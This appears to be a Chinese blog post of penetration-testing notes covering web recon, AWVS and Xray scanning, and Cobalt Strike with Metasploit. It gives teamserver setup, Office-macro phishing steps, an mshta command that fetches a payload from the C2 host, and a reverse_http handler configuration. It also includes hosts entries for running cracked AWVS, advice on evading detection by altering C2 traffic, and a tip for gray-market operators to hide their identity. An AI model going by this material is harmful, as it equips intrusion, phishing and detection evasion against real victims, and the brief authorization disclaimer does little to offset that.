渗透测试全套工具核心知识点总结
一、Web渗透前置流程(CTF/等保/护网Web测)
1. 信息收集全流程
-
域名&子域名探测
-
工具:Fofa、鹰图测绘平台,挖掘二级域名(如
dushi.bookresource.qq.com) -
目标企业官网、公开备案域名作为基础入口
-
-
目录/路径扫描(未授权访问探测)
-
工具:dirsearch、7kbscan
-
敏感路径字典:
/admin、/manage、/login、/reg、/register -
辅助手段:浏览器插件Find Something提取页面隐藏URL、接口路径
-
-
指纹识别
-
工具:潮汐指纹识别、AI渗透平台(TRAE Work)
-
作用:识别CMS、Web框架,针对性复现Nday历史漏洞
-
-
弱口令爆破
-
基础弱口令组合:admin/admin、root/root等,配合后台登录页面爆破
-
2. 漏洞测试分工
-
工具漏扫漏洞:AWVS、Xray,擅长框架历史漏洞、反序列化、通用Web漏洞
-
手动测试漏洞:业务逻辑漏洞(越权、支付、验证码、会话绕过等)
-
Nday复现:需先识别网站CMS/框架,再匹配对应POC验证
3. 两大漏扫工具部署与使用
(1)AWVS(Acunetix)
-
本地host配置(破解/离线扫描必备)
127.0.0.1 erp.acunetix.com ::1 erp.acunetix.com 192.178.49.174 telemetry.invicti.com 2607:f8b0:402a:80a::200e telemetry.invicti.com
-
使用流程 添加目标域名→自定义扫描速度→搭配Burp代理抓包查看完整扫描发包;扫描失败重启程序即可。
-
配套代理链路:AWVS发包 → BurpSuite(抓包分析)
(2)Xray(长亭社区版)
-
启动被动扫描命令
xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --htmloutput=out.html
-
证书配置:执行
xray_windows_amd64.exe genca生成证书,浏览器导入 -
三层代理链路
-
链路1:浏览器 → Xray(端口7777)
-
链路2:浏览器 → Burp(8080) → Xray(7777)
-
-
短板:社区版POC数量少,复杂漏洞需手动补充
4. AI渗透辅助工具 TRAE Work
-
功能:加载AI模型(DeepSeek-V4-Pro等)自动分析漏洞、批量执行POC、自动整理扫描报告
-
适用场景:批量靶场、CMS历史漏洞批量检测
二、内网渗透核心工具 Cobalt Strike(CS)
1. 基础架构
-
架构:Linux服务端 + Windows客户端,支持多用户分布式协同作战
-
默认端口:50050(安全设备黑名单,实战必须修改)
-
流量隐藏:自定义Malleable C2 Profile文件伪装流量
2. 服务端部署(Linux)
# 进入CS服务端目录 cd root/CS4.8/server # 赋予运行权限 chmod +x teamserver TeamServerImage # 启动服务端(本机IP、自定义密码、流量配置文件) ./teamserver 本机IP 自定义密码 profile.profile
3. 基础操作流程:监听配置 → 生成木马 → 目标上线
(1)创建监听器
-
菜单:Cobalt Strike → 监听器 → Add新建
-
常用Payload:
-
Beacon HTTP:反向HTTP木马(目标主动连接CS) -
Foreign HTTP:用于联动MSF
-
-
自定义Host、端口,保存配置
(2)多类型木马生成(有效载荷)
-
Windows可执行程序(exe):直接运行后门
-
Office宏(Word/Excel/PPT):钓鱼核心载体
-
HTA文档:HTML格式后门,
mshta命令远程执行 -
Payload生成器:原始shellcode,可二次免杀加工
(3)目标上线流程
生成木马→上传至目标主机→运行木马→CS监听器捕获Beacon会话
4. Beacon核心功能(目标上线后操作)
-
命令交互
-
?:查看全部可用命令 -
shell 指令:执行系统命令(whoami、dir、ipconfig等) -
sleep 数值:调整心跳回连延时
-
-
远程控制
-
VNC:图形化远程桌面操作目标
-
文件管理:远程上传/下载服务器文件
-
-
内网探测
-
ARP/ICMP网段扫描:探测同网段存活主机、开放端口(防火墙难拦截)
-
Net View:查看局域网共享主机
-
进程列表:查看进程、Kill进程、伪造Token提权
-
-
团队协作
-
公屏聊天:直接输入消息全员可见
-
私聊:
/msg 用户名 消息
-
5. CS插件扩展
-
支持
.cna后缀插件(Ladon、OLa、TaoWu等内网工具) -
加载步骤:脚本管理器 → Load → 选中插件cna文件打开,状态栏显示✔即加载成功
6. CS联动MSF(扩展漏洞库)
-
Kali启动MSF:
msfconsole -
CS新建
Foreign HTTP监听器,IP/端口填写Kali地址 -
MSF配置反向监听:
use exploit/multi/handler set payload windows/meterpreter/reverse_http set Lhost Kali_IP set Lport 监听端口 run
-
CS右键目标会话 → 中转 → 增加会话,选择MSF监听,打通联动通道
7. Office宏钓鱼完整步骤
-
CS生成Office宏代码(有效载荷→Office宏)
-
新建Word/Excel/PPT:视图 → 查看宏 → 自定义宏名 → 创建
-
删除默认VBA代码,粘贴CS生成的宏
-
保存格式:
.xlsm/.docm(启用宏文档) -
目标打开文件点击「启用内容」,CS自动上线
8. HTA后门远程执行
-
CS生成HTA木马,使用站点管理-文件托管上传
-
获取托管URL,目标CMD执行命令上线:
mshta http://CSIP:端口/download/file.ext
三、安全合规&风险提示
-
工具使用边界
-
AWVS/Xray/CS仅可用于授权靶场、企业等保测评、护网行动;禁止无授权扫描公网资产,属于违法渗透
-
-
灰产风险规避(仅学习参考):不使用真实身份、全程代理流量
-
流量规避:CS默认端口易被检测,必须修改端口+自定义Malleable流量配置文件做流量伪装
更多推荐



所有评论(0)